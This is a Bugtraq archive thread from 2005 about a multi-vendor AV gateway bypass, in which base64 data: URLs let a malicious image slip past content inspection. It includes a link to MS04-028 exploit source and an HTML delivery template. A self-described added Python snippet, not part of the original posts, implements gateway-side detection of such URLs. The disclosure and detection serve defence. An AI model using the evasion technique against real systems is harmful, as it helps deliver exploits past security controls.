
Bugtraq mailing list archives
Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability
From: Darren Bounds <lists () intrusense com>
Date: Tue, 11 Jan 2005 14:58:43 -0500
Hello Danny,

This vulnerability is only applicable to the HTTP data while in transit. Once received by the client the image will be rendered and subsequently detected if local AV software is present.

At the present time, I'm not aware of any AV, IDS or IPS vendor that will detect malicious images embedded in HTML in this manner.
Thank you,

Darren Bounds
Intrusense, LLC.
--
Intrusense - Securing Business As Usual

On Jan 11, 2005, at 2:14 PM, Danny wrote:
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well as other security technologies such as IDS and IPS) inspection of HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme, a remote attacker may encode a malicious image within the body of an HTML formatted document to circumvent content inspection.

For example:
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee), however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and it is delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL scheme; Firefox, Safari, Mozilla and Opera do and will render the data and thus successfully execute the payload if the necessary OS and/or application patches have not been applied.

## BEGIN HTML ##
<html>
<body>
<img src="data:image/gif;base64,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">
</body>
</html>
## END HTML ##

Solution:
While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame.

Contributions:
Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response?

...D
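The gap the thread describes is a gateway that scans image responses but never looks inside `data:` URLs carried in HTML. The following is an added example, not code from Darren Bounds, the advisory or any vendor: it implements the missing gateway-side step. It finds RFC 2397 URLs in a page, base64-decodes them (tolerating stripped padding), hands the decoded bytes to whatever scanner the gateway already uses, and additionally flags a declared-versus-actual type mismatch, since the advisory's PoC labels a JPEG as `image/gif`. `hash_scanner` is a hypothetical stand-in for a real AV engine (an exact SHA-256 match), and `BENIGN_GIF` and `SUSPECT_JPEG` are constructed samples: the latter is a JPEG SOI marker plus filler that exploits nothing.

```python
import base64
import binascii
import hashlib
import re
import urllib.parse

# RFC 2397 data URL inside an HTML attribute value:
#   data:[<mediatype>][;name=value...][;base64],<payload>
DATA_URL_RE = re.compile(
    r'data:(?P<mime>[\w/+.-]+)?'          # optional media type, e.g. image/gif
    r'(?P<params>(?:;[\w-]+=[^;,]*)*)'    # optional ;name=value parameters
    r'(?P<b64>;base64)?,'                 # optional base64 flag, then the comma
    r'(?P<payload>[^"\'\s>]*)',           # payload runs until the attribute ends
    re.IGNORECASE,
)

# Magic bytes for the image types a gateway would expect to see.
MAGIC = {
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
}


def sniff_mime(data):
    """Return the MIME type implied by the leading magic bytes, or None."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def extract_data_urls(html):
    """Yield (declared_mime, decoded_bytes) for every data: URL in the page."""
    for m in DATA_URL_RE.finditer(html):
        declared = (m.group("mime") or "text/plain").lower()
        payload = m.group("payload")
        if m.group("b64"):
            # Tolerate stripped '=' padding, which some generators omit.
            padded = payload + "=" * (-len(payload) % 4)
            try:
                data = base64.b64decode(padded)
            except (binascii.Error, ValueError):
                data = b""
        else:
            data = urllib.parse.unquote_to_bytes(payload)
        yield declared, data


def inspect_html(html, scanner):
    """Run every embedded object through the scanner and report findings.

    Each finding is a tuple (kind, declared_mime, detail).
    """
    findings = []
    for declared, data in extract_data_urls(html):
        actual = sniff_mime(data)
        # The PoC in the thread labels a JPEG as image/gif; that mismatch is a
        # cheap signal worth logging even when the scanner itself is silent.
        if actual and actual != declared:
            findings.append(("mime-mismatch", declared, actual))
        verdict = scanner(data)
        if verdict:
            findings.append(("scanner-hit", declared, verdict))
    return findings


# --- Constructed demo data (not from the advisory) -------------------------
BENIGN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16
# Stand-in "bad" JPEG: SOI marker plus filler. It exploits nothing; its hash
# simply plays the role of an AV signature below.
SUSPECT_JPEG = b"\xff\xd8\xff\xe0" + b"CONSTRUCTED-SAMPLE-NOT-AN-EXPLOIT" + b"\x00" * 8
KNOWN_BAD_SHA256 = {hashlib.sha256(SUSPECT_JPEG).hexdigest()}


def hash_scanner(data):
    """Hypothetical stand-in for a real AV engine: exact-hash signature match."""
    digest = hashlib.sha256(data).hexdigest()
    return "sig:" + digest[:12] if digest in KNOWN_BAD_SHA256 else None


def build_page(declared_mime, data):
    """Wrap raw bytes in the same <img src="data:..."> shape as the advisory's PoC."""
    b64 = base64.b64encode(data).decode("ascii")
    return '<html><body><img src="data:%s;base64,%s"></body></html>' % (declared_mime, b64)


if __name__ == "__main__":
    cases = (
        ("mislabelled suspect JPEG", build_page("image/gif", SUSPECT_JPEG)),
        ("benign GIF", build_page("image/gif", BENIGN_GIF)),
    )
    for label, page in cases:
        print(label, "->", inspect_html(page, hash_scanner) or "clean")
```

Plugging this in before the existing engine means the same signature that already catches the raw JPEG response also catches it once wrapped in a `data:` URL; the mismatch check costs nothing extra and surfaces the exact trick the PoC relies on.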
Current thread:

- Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability, Danny (Jan 11)
- Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability, Darren Bounds (Jan 11)
